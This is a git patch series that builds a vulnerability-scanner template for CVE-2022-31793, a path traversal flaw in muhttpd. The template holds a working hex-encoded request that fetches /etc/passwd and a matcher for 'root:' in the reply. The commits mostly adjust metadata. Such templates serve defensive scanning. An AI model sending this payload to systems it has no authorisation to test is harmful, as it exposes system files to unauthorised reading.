From c56784a0364c9f0ade41aca1d1050f345d27994c Mon Sep 17 00:00:00 2001 From: Tae-Su Kim Date: Sun, 31 Jul 2022 20:26:56 +0900 Subject: [PATCH 1/4] Create CVE-2022-31793.yaml --- cves/2022/CVE-2022-31793.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2022/CVE-2022-31793.yaml diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml new file mode 100644 index 0000000000..58c17cb26f --- /dev/null +++ b/cves/2022/CVE-2022-31793.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-31793 + +info: + name: muhttpd <= 1.1.5 - Path traversal + author: scent2d + severity: + description: | + A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. + reference: + - https://derekabdine.com/blog/2022-arris-advisory.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 + classification: + cvss-metrics: + cvss-score: + cve-id: CVE-2022-31793 + cwe-id: + tags: cve,cve2022,muhttpd,lfi,unauthenticated + +network: + - host: + - "{{Hostname}}" + inputs: + - data: "47455420612F6574632F706173737764" # GET a/etc/passwd + type: hex + - data: "\n\n" + + read-size: 128 + matchers: + - type: word + encoding: hex + words: + - "726f6f743a" # root: + part: body \ No newline at end of file From ba2f15e9e80e53076c423c57c38110c519f34e12 Mon Sep 17 00:00:00 2001 From: tae-su kim <45614318+scent2d@users.noreply.github.com> Date: Sun, 31 Jul 2022 22:50:22 +0900 Subject: [PATCH 2/4] Update CVE-2022-31793.yaml Update error YAML Lint #16809 --- cves/2022/CVE-2022-31793.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 58c17cb26f..e75dcd0571 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -3,24 +3,24 @@ id: CVE-2022-31793 info: name: muhttpd <= 1.1.5 - Path traversal author: scent2d - severity: + severity: unknown description: | A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 classification: - cvss-metrics: - cvss-score: + cvss-metrics: unknown + cvss-score: 0.0 cve-id: CVE-2022-31793 - cwe-id: + cwe-id: unknown tags: cve,cve2022,muhttpd,lfi,unauthenticated network: - host: - - "{{Hostname}}" + - "{{Hostname}}" inputs: - - data: "47455420612F6574632F706173737764" # GET a/etc/passwd + - data: "47455420612F6574632F706173737764" type: hex - data: "\n\n" @@ -29,5 +29,5 @@ network: - type: word encoding: hex words: - - "726f6f743a" # root: - part: body \ No newline at end of file + - "726f6f743a" + part: body From 13771bb84d4c995cf6d3c01af9a2b58cac1aac75 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Aug 2022 14:16:47 +0530 Subject: [PATCH 3/4] Update CVE-2022-31793.yaml --- cves/2022/CVE-2022-31793.yaml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index e75dcd0571..08b7b73a39 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -9,12 +9,8 @@ info: reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - classification: - cvss-metrics: unknown - cvss-score: 0.0 - cve-id: CVE-2022-31793 - cwe-id: unknown - tags: cve,cve2022,muhttpd,lfi,unauthenticated + - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 + tags: cve,cve2022,muhttpd,lfi,unauth network: - host: From 44ccfbf7b2dd695cbb14a8b02d7597e23e9f76e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 4 Aug 2022 18:59:59 +0400 Subject: [PATCH 4/4] Update CVE-2022-31793.yaml --- cves/2022/CVE-2022-31793.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 08b7b73a39..2c9b650e48 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -3,18 +3,21 @@ id: CVE-2022-31793 info: name: muhttpd <= 1.1.5 - Path traversal author: scent2d - severity: unknown + severity: high description: | A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - tags: cve,cve2022,muhttpd,lfi,unauth + metadata: + verified: true + tags: cve,cve2022,network,muhttpd,lfi,unauth network: - host: - "{{Hostname}}" + inputs: - data: "47455420612F6574632F706173737764" type: hex @@ -23,7 +26,7 @@ network: read-size: 128 matchers: - type: word + part: body encoding: hex words: - "726f6f743a" - part: body